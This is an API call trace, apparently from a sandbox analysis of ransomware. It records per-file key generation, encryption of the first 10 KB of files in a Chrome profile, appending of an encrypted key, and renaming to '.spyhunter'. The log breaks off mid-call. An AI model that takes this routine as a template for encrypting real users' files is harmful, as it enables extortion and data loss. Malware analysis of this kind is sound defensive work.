[0137.606] GetProcessHeap () returned 0x2c0000 [0137.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0137.606] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f540*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f540*=0x30) returned 1 [0137.606] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.611] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png") returned 173 [0137.611] StrStrW (lpFirst="topbar_floating_button_hover.png", lpSrch=".txt") returned 0x0 [0137.611] GetProcessHeap () returned 0x2c0000 [0137.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.611] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f504, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f504*=0xa0, lpOverlapped=0x0) returned 1 [0137.612] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.612] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x248f504, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f504*=0xa0, lpOverlapped=0x0) returned 1 [0137.612] GetProcessHeap () returned 0x2c0000 [0137.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.612] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.612] WriteFile (in: hFile=0x18c, lpBuffer=0x248f544*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f504, lpOverlapped=0x0 | out: lpBuffer=0x248f544*, lpNumberOfBytesWritten=0x248f504*=0x4, lpOverlapped=0x0) returned 1 [0137.612] WriteFile (in: hFile=0x18c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f504, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f504*=0x30, lpOverlapped=0x0) returned 1 [0137.612] CloseHandle (hObject=0x18c) returned 1 [0137.613] GetProcessHeap () returned 0x2c0000 [0137.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.613] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.spyhunter") returned 183 [0137.613] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button_hover.png.spyhunter")) returned 1 [0137.614] GetProcessHeap () returned 0x2c0000 [0137.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.614] GetProcessHeap () returned 0x2c0000 [0137.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0137.614] GetProcessHeap () returned 0x2c0000 [0137.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0f978 | out: hHeap=0x2c0000) returned 1 [0137.614] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f540 | out: pbBuffer=0x248f540) returned 1 [0137.614] GetProcessHeap () returned 0x2c0000 [0137.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0137.614] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f538*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f538*=0x30) returned 1 [0137.614] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.615] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png") returned 167 [0137.615] StrStrW (lpFirst="topbar_floating_button.png", lpSrch=".txt") returned 0x0 [0137.615] GetProcessHeap () returned 0x2c0000 [0137.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.615] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f4fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f4fc*=0xa0, lpOverlapped=0x0) returned 1 [0137.616] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.616] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x248f4fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f4fc*=0xa0, lpOverlapped=0x0) returned 1 [0137.616] GetProcessHeap () returned 0x2c0000 [0137.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.616] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.616] WriteFile (in: hFile=0x18c, lpBuffer=0x248f53c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f4fc, lpOverlapped=0x0 | out: lpBuffer=0x248f53c*, lpNumberOfBytesWritten=0x248f4fc*=0x4, lpOverlapped=0x0) returned 1 [0137.616] WriteFile (in: hFile=0x18c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f4fc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f4fc*=0x30, lpOverlapped=0x0) returned 1 [0137.616] CloseHandle (hObject=0x18c) returned 1 [0137.617] GetProcessHeap () returned 0x2c0000 [0137.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.617] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.spyhunter") returned 177 [0137.617] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\topbar_floating_button.png.spyhunter")) returned 1 [0137.617] GetProcessHeap () returned 0x2c0000 [0137.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0137.618] GetProcessHeap () returned 0x2c0000 [0137.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0137.618] GetProcessHeap () returned 0x2c0000 [0137.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8120 | out: hHeap=0x2c0000) returned 1 [0137.618] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f540 | out: pbBuffer=0x248f540) returned 1 [0137.618] GetProcessHeap () returned 0x2c0000 [0137.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0137.618] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f538*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f538*=0x30) returned 1 [0137.618] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0137.619] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png") returned 152 [0137.619] StrStrW (lpFirst="icon_16.png", lpSrch=".txt") returned 0x0 [0137.619] GetProcessHeap () returned 0x2c0000 [0137.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.619] ReadFile (in: hFile=0x18c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f4fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f4fc*=0x22c, lpOverlapped=0x0) returned 1 [0137.620] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xfffffdd4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.620] WriteFile (in: hFile=0x18c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x22c, lpNumberOfBytesWritten=0x248f4fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f4fc*=0x22c, lpOverlapped=0x0) returned 1 [0137.620] GetProcessHeap () returned 0x2c0000 [0137.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.620] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.620] WriteFile (in: hFile=0x18c, lpBuffer=0x248f53c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f4fc, lpOverlapped=0x0 | out: lpBuffer=0x248f53c*, lpNumberOfBytesWritten=0x248f4fc*=0x4, lpOverlapped=0x0) returned 1 [0137.621] WriteFile (in: hFile=0x18c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f4fc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f4fc*=0x30, lpOverlapped=0x0) returned 1 [0137.621] CloseHandle (hObject=0x18c) returned 1 [0137.621] GetProcessHeap () returned 0x2c0000 [0137.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0137.621] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.spyhunter") returned 162 [0137.621] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_16.png.spyhunter")) returned 1 [0138.081] GetProcessHeap () returned 0x2c0000 [0138.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0138.081] GetProcessHeap () returned 0x2c0000 [0138.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0138.081] GetProcessHeap () returned 0x2c0000 [0138.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7fbc8 | out: hHeap=0x2c0000) returned 1 [0138.085] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f538 | out: pbBuffer=0x248f538) returned 1 [0138.085] GetProcessHeap () returned 0x2c0000 [0138.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0138.085] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f530*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f530*=0x30) returned 1 [0138.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0138.086] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json") returned 164 [0138.086] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0138.086] GetProcessHeap () returned 0x2c0000 [0138.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0138.086] ReadFile (in: hFile=0x18c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f4f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f4f4*=0x2800, lpOverlapped=0x0) returned 1 [0138.132] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.133] WriteFile (in: hFile=0x18c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f4f4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f4f4*=0x2800, lpOverlapped=0x0) returned 1 [0138.133] GetProcessHeap () returned 0x2c0000 [0138.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0138.133] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.133] WriteFile (in: hFile=0x18c, lpBuffer=0x248f534*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f4f4, lpOverlapped=0x0 | out: lpBuffer=0x248f534*, lpNumberOfBytesWritten=0x248f4f4*=0x4, lpOverlapped=0x0) returned 1 [0138.227] WriteFile (in: hFile=0x18c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f4f4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f4f4*=0x30, lpOverlapped=0x0) returned 1 [0138.227] CloseHandle (hObject=0x18c) returned 1 [0138.227] GetProcessHeap () returned 0x2c0000 [0138.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0138.227] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.spyhunter") returned 174 [0138.227] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.spyhunter")) returned 1 [0138.228] GetProcessHeap () returned 0x2c0000 [0138.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0138.228] GetProcessHeap () returned 0x2c0000 [0138.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0138.228] GetProcessHeap () returned 0x2c0000 [0138.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe53a0 | out: hHeap=0x2c0000) returned 1 [0138.228] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f530 | out: pbBuffer=0x248f530) returned 1 [0138.228] GetProcessHeap () returned 0x2c0000 [0138.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0138.228] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f528*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f528*=0x30) returned 1 [0138.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticonsold\\2b03.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0138.327] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp") returned 105 [0138.327] StrStrW (lpFirst="2B03.tmp", lpSrch=".txt") returned 0x0 [0138.327] GetProcessHeap () returned 0x2c0000 [0138.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0138.327] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f4ec*=0x0, lpOverlapped=0x0) returned 1 [0138.327] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.327] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x248f4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f4ec*=0x0, lpOverlapped=0x0) returned 1 [0138.327] GetProcessHeap () returned 0x2c0000 [0138.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0138.327] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.327] WriteFile (in: hFile=0xb4, lpBuffer=0x248f52c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f4ec, lpOverlapped=0x0 | out: lpBuffer=0x248f52c*, lpNumberOfBytesWritten=0x248f4ec*=0x4, lpOverlapped=0x0) returned 1 [0138.328] WriteFile (in: hFile=0xb4, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f4ec, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f4ec*=0x30, lpOverlapped=0x0) returned 1 [0138.328] CloseHandle (hObject=0xb4) returned 1 [0138.328] GetProcessHeap () returned 0x2c0000 [0138.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.328] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp.spyhunter") returned 115 [0138.329] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticonsold\\2b03.tmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B03.tmp.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticonsold\\2b03.tmp.spyhunter")) returned 1 [0138.329] GetProcessHeap () returned 0x2c0000 [0138.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.329] GetProcessHeap () returned 0x2c0000 [0138.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0138.329] GetProcessHeap () returned 0x2c0000 [0138.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4a698 | out: hHeap=0x2c0000) returned 1 [0138.329] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f530 | out: pbBuffer=0x248f530) returned 1 [0138.329] GetProcessHeap () returned 0x2c0000 [0138.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0138.332] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f528*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f528*=0x30) returned 1 [0138.332] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0138.333] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal") returned 105 [0138.333] StrStrW (lpFirst="Safe Browsing Channel IDs-journal", lpSrch=".txt") returned 0x0 [0138.333] GetProcessHeap () returned 0x2c0000 [0138.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0138.333] ReadFile (in: hFile=0x154, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f4ec*=0x0, lpOverlapped=0x0) returned 1 [0138.333] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.333] WriteFile (in: 